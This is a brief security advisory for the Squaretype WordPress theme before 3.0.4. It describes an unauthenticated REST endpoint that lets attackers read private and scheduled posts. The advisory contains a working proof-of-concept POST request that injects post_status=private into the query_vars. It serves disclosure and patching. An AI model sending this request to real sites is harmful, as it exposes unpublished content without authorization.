Squaretype Modern Blog < 3.0.4 - Unauthenticated Private/Schedule Posts Disclosure

The theme allows unauthenticated users to manipulate the query_vars used to retrieve the posts to display in one of its REST endpoint, without any validation. As a result, private and scheduled posts could be retrieved via a crafted request.

PoC

POST /wp-json/csco/v1/more-posts Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 186 action=csco_ajax_load_more&page;=1&posts;_per_page=10&query;_data=%7b%22location%22%3a%22%22%2c%22infinite_load%22%3afalse%2c%22query_vars%22%3a%7b%22post_status%22%3a%20%22private%22%7d%7d